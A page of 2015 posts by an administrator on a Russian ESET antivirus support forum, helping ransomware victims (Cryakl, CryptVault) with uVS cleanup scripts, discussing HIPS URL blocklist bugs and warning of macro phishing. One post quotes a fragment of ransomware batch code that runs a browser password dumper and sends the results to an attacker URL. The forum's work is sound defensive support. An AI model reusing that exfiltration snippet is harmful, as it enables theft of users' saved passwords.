Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.

Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новые продукты компании PRO32.

PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 512 513 514 515 516 517 518 519 520 521 522 ... 1784 След.
Тестируем HIPS
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 01.09.2015 18:32:52
ZloyDi,
добавил в текстовый файл еще одну строку
*себастьян.янке.рф/*
и получил после импорта в блокирующем списке запись (как я и ожидал)
*../*
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 01.09.2015 17:43:30
Владимир,
повторный образ не нужен.
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 01.09.2015 16:22:33
Владимир Исаков,
по очистке системы выполните скрипт в uVS
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.4 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

chklst
delvir

delref %SystemDrive%\PROGRAM FILES\EXPLORE.EXE

deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------
2. по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус.

3. по восстановлению документов напишите в почту [email protected]
[ Как создать образ автозапуска? ]
Перейти
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 01.09.2015 08:42:26
Дмитрий Федоров,
конечно тащит.
Цитата

                                **********************************************
                                         Browser Password Recovery Report
                                **********************************************

____________________________________________________________­___________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com


из тела энкодера запускается утилита для поиска паролей в браузерах.
найденные пароли будут отправлены на сайт злоумышленников.

фрагмент кода:

Цитата
if exist 065ed39e.exe (
"%temp%\065ed39e.exe" -f "%temp%\6eb7832c.a238703f"
wscript.exe //B //Nologo //T:120 "%temp%\3c2901e8.vbs" "%temp%\6eb7832c.a238703f" хттп://attached-email.com/v.php pf
del /f /q 065ed39e.exe
)
Изменено: santy - 01.09.2015 08:42:51
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 01.09.2015 07:37:54
1. по образу все чисто. нет шифратора в автозапуске.

2. по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус.

3. по восстановлению документов напишите в почту [email protected]
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 01.09.2015 05:41:51
Ольга Белоусова,
теперь все правильно.

по очистке системы выполните:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.86.4 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
delall %SystemDrive%\PROGRAM FILES (X86)\TENCENT\QQMUSIC\QQMUSIC1203.9.58.17\IEBACK.BAT
delall %SystemDrive%\PROGRAM FILES (X86)\TENCENT\QQMUSIC\QQMUSIC1203.9.58.17\JSREGISTER.BAT
delall D:\PROGRAM FILES (X86)\TENCENT\QQPCMGR\10.9.16345.222\PLUGINS\FILESMASH\QMSOFTEXT64.DLL
delall %SystemDrive%\PROGRAMDATA\VKSAVER\VKSAVER.EXE
delref HTTP://WWW.HAO123.COM/?TN=91800134_HAO_PG
deltmp
delnfr
delref %SystemDrive%\USERS\ЛЮБА\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\JHCDLKGJIEHGPNPOLKBNMPFFJODIGBKB\0.2.0_0\JOXI СДЕЛАЙ СКРИНШОТ ЭКРАНА
delref %SystemDrive%\USERS\ЛЮБА\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\GIGHMMPIOBKLFEPJOCNAMGKKBIGLIDOM\2.36.2_0\ADBLOCK
restart

перезагрузка, пишем о старых и новых проблемах.
------------

по восстановлению документов написал вам в почту.
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 01.09.2015 05:35:30
Константин Гончаров,
ответил в почту.
опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо  перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами.
Изменено: santy - 04.06.2016 17:32:48
[ Как создать образ автозапуска? ]
Перейти
Шифровирусы шумной толпою
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 31.08.2015 10:45:47
новый ход мошенников:
в качестве вложения офисный документ, предлагают по сути понизить уровень безопасности в Офисе, с тем чтобы автоматически были запущены макросы, добавленные в документ.

Акт сверки - 27.08.2015 - Подтвердите правильность данных

содержимое документа.

[ Как создать образ автозапуска? ]
Перейти
Тестируем HIPS
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 31.08.2015 06:45:36
кстати,  в 6.2 еще и импорт кривой из файлов в блок-листы URL
вместо адреса *янке.рф/*     добавляетcя строка *./*
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 31.08.2015 05:25:25
теперь добавьте новый образ автозапуска.
[ Как создать образ автозапуска? ]
Перейти
Пред. 1 ... 512 513 514 515 516 517 518 519 520 521 522 ... 1784 След.